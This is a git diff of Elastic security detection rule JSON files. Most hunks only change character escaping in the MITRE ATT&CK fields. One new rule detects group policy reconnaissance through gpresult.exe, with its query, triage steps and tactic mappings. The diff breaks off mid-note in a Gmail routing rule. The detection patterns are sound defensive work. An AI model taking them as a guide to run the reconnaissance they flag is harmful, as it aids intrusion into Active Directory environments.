"framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json index 27e67ee7774..6052f8b07df 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json index 79e1fe8385c..4e071471db4 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json index 319d54caa23..cb9308d0c51 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_101.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json index b4393926b2a..1d0d278b698 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_102.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json index 392f702c517..b88836e21bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json index 415671dff58..2240e007fbd 100644 --- a/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json +++ b/packages/security_detection_engine/kibana/security_rule/931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4_203.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json index 74850590a2f..a0433a640ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json index 3aef4e11a82..ca2c6c63200 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json index 2ac45698c77..cfb7750e06e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json index 8ab0cb15f31..18cad8cb17c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json +++ b/packages/security_detection_engine/kibana/security_rule/9395fd2c-9947-4472-86ef-4aceb2f7e872_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json index fe21eb7ca91..3caae287c52 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_104.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json index 2174b2bbcae..d142757781b 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_105.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json index 3d325d8e508..142dfb99b7f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_106.json @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json index 7fa99b7aeac..38bfb4c6e7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_107.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json index 5805e201cc7..e647a535c2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_103.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json index 4cdfd789666..6b5fe580f46 100644 --- a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_104.json @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json index 1e17368d21f..e69c604921f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_105.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json index da404946d63..404b64dce5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_203.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json index 3fcca900c1f..fe290a261ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_204.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json index 91f0362f0d8..2aa23f0c03f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json index 041bd7d2946..71c78f1f4d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_101.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json index a46154392d0..be7d993cc86 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json index 499b2484bb1..66c18d083fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json index 48f67187bdb..273d2f8b737 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json index ff133f4216a..fc16a503663 100644 --- a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_204.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json index d9b38e98315..54c68566930 100644 --- a/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_1.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json index bbe4f871b65..01b9232365c 100644 --- a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json index 0598d0b5a04..847fb8cdbda 100644 --- a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json index 6f3c65080a8..610af1c9256 100644 --- a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_4.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5.json new file mode 100644 index 00000000000..b63d27d7122 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Group Policy Discovery via Microsoft GPResult Utility", + "note": "## Triage and analysis\n\n### Investigating Group Policy Discovery via Microsoft GPResult Utility\n\nGroup Policy is a Windows feature that allows administrators to manage and configure settings for users and computers in an Active Directory environment. The Microsoft GPResult utility (`gpresult.exe`) is a command-line tool used to query and display Group Policy Objects (GPOs) applied to a system.\n\nThis rule identifies the execution of `gpresult.exe` or renamed instances with specific arguments, which can be abused by attackers to gain insights into the active directory environment and identify potential privilege escalation or lateral movement opportunities.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate any abnormal behavior by the parent process, such as network connections, registry or file modifications, and any other spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name: \"gpresult.exe\" or process.pe.original_file_name == \"gprslt.exe\") and process.args: (\"/z\", \"/v\", \"/r\", \"/x\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json index 3b236cdcc1f..f8dbc54078e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json index cff3a6bea37..06196718727 100644 --- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_105.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Custom Gmail Route Created or Modified", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Custom Gmail Route Created or Modified\n\nGmail is a popular cloud-based email service developed and managed by Google. Gmail is one of many services available for users with Google Workspace accounts.\n\nThreat actors often send phishing emails containing malicious URL links or attachments to corporate Gmail accounts. Google Workspace identity relies on the corporate user Gmail account and if stolen, allows threat actors to further their intrusion efforts from valid user accounts.\n\nThis rule identifies the creation of a custom global Gmail route by an administrator from the Google Workspace admin console. Custom email routes could indicate an attempt to secretly forward sensitive emails to unintentional recipients.\n\n#### Possible investigation steps\n\n- Identify the user account that created the custom email route and verify that they should have administrative privileges.\n- Review the added recipients from the custom email route and confidentiality of potential email contents.\n- Identify the user account, then review `event.action` values for related activity within the last 48 hours.\n- If the Google Workspace license is Enterprise Plus or Education Plus, search for emails matching the route filters. To find the Gmail event logs, go to `Reporting \u003e Audit and investigation \u003e Gmail log events`.\n- If existing emails have been sent and match the custom route criteria, review the sender and contents for malicious URL links and attachments.\n- Identified 